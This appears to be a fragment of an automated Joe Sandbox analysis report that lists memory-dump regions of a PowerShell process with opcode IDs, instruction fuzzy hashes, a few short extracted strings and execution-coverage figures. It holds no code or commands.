                                                                          • Instruction Fuzzy Hash: 7691A1B4B202059FD714DB58C585BAEB7F2BF88310F208029E5016FB91DB76EC42CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k
                                                                          • API String ID: 0-3814145804
                                                                          • Opcode ID: 4dbf722715b46466010796c6ea78d77b7c1f9e0e9bcd29a4c72b462054c9f2fe
                                                                          • Instruction ID: 02842b7f02456cdb670362a6cfee3730adeff6eb9bc1733ef19050c7dd851d54
                                                                          • Opcode Fuzzy Hash: 4dbf722715b46466010796c6ea78d77b7c1f9e0e9bcd29a4c72b462054c9f2fe
                                                                          • Instruction Fuzzy Hash: D391D4B4A202059FD700CB54C585B9EBBF2BF88314F258069E5016F791CB76EC82CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k
                                                                          • API String ID: 0-3814145804
                                                                          • Opcode ID: f89e94d2902b1d2e922c1cdb0ccae1ac3f067b7a95433acb927bf3af0ad24ce2
                                                                          • Instruction ID: 1dea7e7a908ea62be972c0afecd719df50b88f9db1cf40bfbdee1956f46a6795
                                                                          • Opcode Fuzzy Hash: f89e94d2902b1d2e922c1cdb0ccae1ac3f067b7a95433acb927bf3af0ad24ce2
                                                                          • Instruction Fuzzy Hash: 86319374B51204ABE704EB64C855BAE77B3AF84344F24C429E9016FB91CEBADC428B91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84l
                                                                          • API String ID: 0-1480273888
                                                                          • Opcode ID: bffb0852c3ff0bccb9c81d18eba767d9f68616ada600cc93cb65cc06a04d9e13
                                                                          • Instruction ID: d99b431c6b0f64aee2908a82ea88e40a9bbe9a2f625b90f1d53829254b9d0e39
                                                                          • Opcode Fuzzy Hash: bffb0852c3ff0bccb9c81d18eba767d9f68616ada600cc93cb65cc06a04d9e13
                                                                          • Instruction Fuzzy Hash: 63313970611356DFD721CB94C810BAAFBF1BF45320F24846AE545AF352CA71DC02C7A1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2dac7232cb15a7cd469a47175dfd45b9519a4305b405c7680ceb72bada910b21
                                                                          • Instruction ID: 2d56a8eacd8ae5bec68565191b74796b8a2cdbbf539a6775a213e7ddc0784d1f
                                                                          • Opcode Fuzzy Hash: 2dac7232cb15a7cd469a47175dfd45b9519a4305b405c7680ceb72bada910b21
                                                                          • Instruction Fuzzy Hash: D9226E34B002189FCB25DB35D955AAEB7F2AF89340F1480A9D40AAB361DF35DE85DF81
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87de5bd268f8642aa54bce6815531e55756263daa6a982fae0793b1ef30bb37e
                                                                          • Instruction ID: 97344cf5d5ac5e8b94ec15b38424498d9a700bed4ffbda323b8869daafa21011
                                                                          • Opcode Fuzzy Hash: 87de5bd268f8642aa54bce6815531e55756263daa6a982fae0793b1ef30bb37e
                                                                          • Instruction Fuzzy Hash: 0A1269B4A20206DFDB10CB98C581BAABBF2BF99314F25C169E8059F755CB72EC41CB51
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d43cfc838a8d4613542bced733c9498421cf928ec3b30417c501811c5e3bc1df
                                                                          • Instruction ID: df9eafb5a4bd5173369056bc0f7f5687c1107703a566b0f282f7c7af7dea9752
                                                                          • Opcode Fuzzy Hash: d43cfc838a8d4613542bced733c9498421cf928ec3b30417c501811c5e3bc1df
                                                                          • Instruction Fuzzy Hash: CCB115B1B24346CFDB348A69D41176ABBE2FFE5210F29806BD8058B641DB75C981CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba48707e36607392daf8474a01da8a927028fb96f5cbee80663b78d90cc13fdd
                                                                          • Instruction ID: a3b2bfdd06fa8f8275b78d1ace0952d89deb4ebc9a4d3d8a9fd39a7c615f642f
                                                                          • Opcode Fuzzy Hash: ba48707e36607392daf8474a01da8a927028fb96f5cbee80663b78d90cc13fdd
                                                                          • Instruction Fuzzy Hash: 49C18B31A002089FCB15DFA4C994A9DBBF2FF85310F154569E406EB365DB34ED89DB81
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2294dcfb210898c7b5143e4504d4e680847f4ea3062ce91f6b6688d791c0aa51
                                                                          • Instruction ID: 4e1f46cb2afff68cc232a5bcefe4079b30999bbfbb387d0256fe48276296bb8f
                                                                          • Opcode Fuzzy Hash: 2294dcfb210898c7b5143e4504d4e680847f4ea3062ce91f6b6688d791c0aa51
                                                                          • Instruction Fuzzy Hash: E0D10374E01209AFDB05CFA8D584A9DFBB2EF49310F248159E805AB366C735EE81DB90
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0304efdc0cf493bce2e4e8cd07d4666e45cbeffef1a25885d9b6bd182d4039fe
                                                                          • Instruction ID: 499253c74d3df29e15f05380e000ac7277241f61b63b3ee877c4fd0191c7cfcb
                                                                          • Opcode Fuzzy Hash: 0304efdc0cf493bce2e4e8cd07d4666e45cbeffef1a25885d9b6bd182d4039fe
                                                                          • Instruction Fuzzy Hash: 2E91396240E3E15FD7039B3898715EABFB5AE4321070A41C7D090CF2A3D529AD4DC7BA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44f07a1ffd6a873d325769cf6ee6d19c1015c53f40b81d45924ee6b7841ebfe1
                                                                          • Instruction ID: 535be5f61634b733ef804d4812b42efa79b666083aea50fd7214b999c714499c
                                                                          • Opcode Fuzzy Hash: 44f07a1ffd6a873d325769cf6ee6d19c1015c53f40b81d45924ee6b7841ebfe1
                                                                          • Instruction Fuzzy Hash: 088159B2728346DFD7218B65C81076BBBF5FFD6211F29806BD885CB252CA35C981C7A1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed584efffccd46db3aac6e0a021df2dd8ed07d92ac3f14f33d99d570f273e196
                                                                          • Instruction ID: 30f65c015eef91701f872988b8f0407809a71ad5d308365ae6a5ba1b4c84abba
                                                                          • Opcode Fuzzy Hash: ed584efffccd46db3aac6e0a021df2dd8ed07d92ac3f14f33d99d570f273e196
                                                                          • Instruction Fuzzy Hash: 65919D30A012049FC714DFA8D844AAEBBF2FF89310F198569E445AB762CB35ED45DF50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e23a6f288605726a08d6a44a5f876bb64d45fb3d2b1c8d79410a2aa6bc4834e2
                                                                          • Instruction ID: 0dbd87ab2842fb8eb2828d714d258c314a872609cb1521a2cec75894a0209bb4
                                                                          • Opcode Fuzzy Hash: e23a6f288605726a08d6a44a5f876bb64d45fb3d2b1c8d79410a2aa6bc4834e2
                                                                          • Instruction Fuzzy Hash: A361F3B1724346DFDB258B65C80076ABBF1BF96211F2AC0ABD845CB292DF76C841C761
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6506afbaafda17e893e5722f87460a20c450042e34442b6da8c69065442b3789
                                                                          • Instruction ID: ef10b437a465f687c781a09e6021f70b897435e9b05f4ca17ff2b617421d8caa
                                                                          • Opcode Fuzzy Hash: 6506afbaafda17e893e5722f87460a20c450042e34442b6da8c69065442b3789
                                                                          • Instruction Fuzzy Hash: E7715A31E00208DFDB14DFA4D884AADBBF2BF88354F148529E402AB7A0CF75AD46DB51
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfafdcb0371dbbdcdd6b45ac685280c91071e18df4a48accb44246a025f50316
                                                                          • Instruction ID: 24535498dd7973d643cf2180a46b5588481207ac208c7a71be3cbd1195ebcb41
                                                                          • Opcode Fuzzy Hash: cfafdcb0371dbbdcdd6b45ac685280c91071e18df4a48accb44246a025f50316
                                                                          • Instruction Fuzzy Hash: D961A434E003499FCB15CFA4C554AADBBB2BF45340F154259E402AF366CB38ED8ADB80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec254d4c72a28436c5bf60a49a21295fa0d0fd9179aa0f0a929b76cf8424d2b9
                                                                          • Instruction ID: afb330d6f58228cc5abca474685d243ce5fa8e1e10a294ccb3d12ac9c77ec6d0
                                                                          • Opcode Fuzzy Hash: ec254d4c72a28436c5bf60a49a21295fa0d0fd9179aa0f0a929b76cf8424d2b9
                                                                          • Instruction Fuzzy Hash: D5615135E002499FCB14DFE4D554AADBBB2BF84340F258259E402AF365DB78ED89DB80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1bc403f937a18c8df47f6b15bf6e23753b608ef041991602875a4463b8244809
                                                                          • Instruction ID: 40c10c93e87016a542f8047b3916790919b8297e05f3835567c1a2747c69c4ad
                                                                          • Opcode Fuzzy Hash: 1bc403f937a18c8df47f6b15bf6e23753b608ef041991602875a4463b8244809
                                                                          • Instruction Fuzzy Hash: 4B518E71A002089FDB14DFA9D844AAEBBF6FF89354F108569D405EB7A0DF75AC42CB90
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9bbdf47374316400e6d99aa1499973eacddd33c11fc7ce8025fc662779fc2241
                                                                          • Instruction ID: d6bfd352365216f2000fc96369ffb30fb625cbf1bedd2defdc0c2325bf917487
                                                                          • Opcode Fuzzy Hash: 9bbdf47374316400e6d99aa1499973eacddd33c11fc7ce8025fc662779fc2241
                                                                          • Instruction Fuzzy Hash: 1D614F34E002499FCB14DFE4D554AADBBB2BF88340F158659E402AF365DB78ED89DB80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 23bc9ba7f0b09e6cadc136943a19cf1cd88afa3966ffe123afe03c392712f9db
                                                                          • Instruction ID: ac5f6279f7619c7b553277de9f59f414587cf0f7e4d0a99502fa31b6b1b9c904
                                                                          • Opcode Fuzzy Hash: 23bc9ba7f0b09e6cadc136943a19cf1cd88afa3966ffe123afe03c392712f9db
                                                                          • Instruction Fuzzy Hash: 81518134E002499FCB15CFA4D554AADBBB2BF45340F158259E402AF366DB78ED89DB80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6a9af1f502ac9484d42efbd70063bb384822afb8aaa7769cb0fd48bda5fa815
                                                                          • Instruction ID: 321f396a5f0176cc0dc063f87368d59d0dc347889114830ef200b9ae5c6a0b9b
                                                                          • Opcode Fuzzy Hash: f6a9af1f502ac9484d42efbd70063bb384822afb8aaa7769cb0fd48bda5fa815
                                                                          • Instruction Fuzzy Hash: 5E415032B002148FDB24DF74C999AAD7BB2EF88754F194468E406EB7A5DF349C81EB50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93b591c4361541dc2b97e188807f2e5a14fc367b85deb073ba892f9cb375a321
                                                                          • Instruction ID: e06bdf3bb07085a71adb5eb81b66e049268931cb7778e8db15a835735844d49a
                                                                          • Opcode Fuzzy Hash: 93b591c4361541dc2b97e188807f2e5a14fc367b85deb073ba892f9cb375a321
                                                                          • Instruction Fuzzy Hash: 84416C70E002089FDB14DFA5C8846ADBBF2BF89354F148529D006AB7A0DF74AC46CF91
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 558e95f9a42708af35c75ebb3afdff3b840c34659365a10c8cf26ee8ef4db652
                                                                          • Instruction ID: dc00f8f63bf1e3a974c7da8075ccab1236e02bffcc95d001a945b82f07808bb5
                                                                          • Opcode Fuzzy Hash: 558e95f9a42708af35c75ebb3afdff3b840c34659365a10c8cf26ee8ef4db652
                                                                          • Instruction Fuzzy Hash: 72311930B002188FCF259B64C9956EEB7B2AF89344F1084E9D509AB351DB359E85DF81
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 385314cc95b4330eecd88484d94083039c2081df9c81bb01261840f7a7d5b997
                                                                          • Instruction ID: 32e195450c245a8d43b7c086912388bd67989bf9acccf245b41cd1970b450142
                                                                          • Opcode Fuzzy Hash: 385314cc95b4330eecd88484d94083039c2081df9c81bb01261840f7a7d5b997
                                                                          • Instruction Fuzzy Hash: 27318E31E001089FCB14DFA4C584AEDB7F7AF89354F24856AE401AB750CF31AD46DB91
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 500b41b25900dcb45fcd18405ad45d6dfa78a2c8e90608a6744020da3fb7a03e
                                                                          • Instruction ID: 889798407e8d4045db24dc9d38085f429c7ac66656552da73e0e50c16dcdbb1c
                                                                          • Opcode Fuzzy Hash: 500b41b25900dcb45fcd18405ad45d6dfa78a2c8e90608a6744020da3fb7a03e
                                                                          • Instruction Fuzzy Hash: 08214CB3B14211CBD7249668D80279AB3E2FFD6215B2480BBD5428B741EE72D842C7E1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6579c5fbb4d8767b379d4a6cfb41bf9d4479a4979aa703703e7273f92c1ffa1
                                                                          • Instruction ID: 2487b884e724c995cd00afae4c7db815f23810a95c7ac2985af06840d7085684
                                                                          • Opcode Fuzzy Hash: a6579c5fbb4d8767b379d4a6cfb41bf9d4479a4979aa703703e7273f92c1ffa1
                                                                          • Instruction Fuzzy Hash: E3315976B002089FCB14DF28D899AAD7BF2AF8C361F140168E506EB7A1CF759C42DB50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca3b6421c26f315aa4b26d83c3525ec29bc3d2fc582c6e1ab5fdb951774575d6
                                                                          • Instruction ID: 033fb99b21fe69661ceb8f00557336406aa545018e3e55dff23a7447dc21e513
                                                                          • Opcode Fuzzy Hash: ca3b6421c26f315aa4b26d83c3525ec29bc3d2fc582c6e1ab5fdb951774575d6
                                                                          • Instruction Fuzzy Hash: 6B212574A04606DFCB04CF49C585EAAF7B9FB88310B248568D909EB751C732EC92CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5487faed6cd4d6311fb3736c51bfe96d6eddda7bfa3c5fab2670489432c106e
                                                                          • Instruction ID: 9f086cc9896b56f9bca5eb3f4e7682c80755d2586aed2e624d17a6cd2129a17d
                                                                          • Opcode Fuzzy Hash: e5487faed6cd4d6311fb3736c51bfe96d6eddda7bfa3c5fab2670489432c106e
                                                                          • Instruction Fuzzy Hash: 85214F74A042199FCB00CF98D490AAEFBF1FF89310B158596D959EB352C731ED41DBA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f25cb2e2011ddb674ddfae24ba96ab0abf58088954e1440842a8be266830b94e
                                                                          • Instruction ID: 7ac599dde3bff3b42d3e5d3cddfc07246890a433c738928bb92527b573a66e56
                                                                          • Opcode Fuzzy Hash: f25cb2e2011ddb674ddfae24ba96ab0abf58088954e1440842a8be266830b94e
                                                                          • Instruction Fuzzy Hash: 3911E231204340CFC7269B28D504A957BA5AF86769F0A41EEE00C8B3A3CB76DC4BC791
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95a7778a41b219d5a41395015fa35744b6e231e5cf224cef8691962077f5cee4
                                                                          • Instruction ID: 4110d27f4951d8620833f3c79a3e89af8a645c0866d839cb0b366443235fbe51
                                                                          • Opcode Fuzzy Hash: 95a7778a41b219d5a41395015fa35744b6e231e5cf224cef8691962077f5cee4
                                                                          • Instruction Fuzzy Hash: F5212974A042099FCB00DF98D990AAEFBF1FF89310B148599E919EB352C735ED41CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba34aefa17d949e035942859ec351dc8f52a58aa71e85f1dba9f3ddab1fac6c0
                                                                          • Instruction ID: 1d7fe53dd8893a098bb05d77081a01dd68bb81c685c00ae76c52cde205a581b6
                                                                          • Opcode Fuzzy Hash: ba34aefa17d949e035942859ec351dc8f52a58aa71e85f1dba9f3ddab1fac6c0
                                                                          • Instruction Fuzzy Hash: 5B11E0B5324387CFD7318B14C840A66BBF5FFE2255B1980AFD9048B262D776C881CB20
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 59e4e30eff333c8311cec87a31c767a1e5ec9067ba122eefa3b34da4ce689144
                                                                          • Instruction ID: d752e022a3ed4f678c028d3387d13a2d05fe1a5361af805365c0e65b91bbca08
                                                                          • Opcode Fuzzy Hash: 59e4e30eff333c8311cec87a31c767a1e5ec9067ba122eefa3b34da4ce689144
                                                                          • Instruction Fuzzy Hash: ED112BB42193829FDB12C760C854AA9BBB1AFD721071DC1DFD0848F193CE72D846C752
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840557052.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_efd000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840557052.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_efd000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840557052.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_efd000_powershell.jbxd
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84l$84l$84l$84l
                                                                          • API String ID: 0-3024328185

                                                                          Execution Graph

                                                                          Execution Coverage: 8.8%
                                                                          Dynamic/Decrypted Code Coverage: 100%
                                                                          Signature Coverage: 0%
                                                                          Total number of Nodes: 166
                                                                          Total number of Limit Nodes: 15

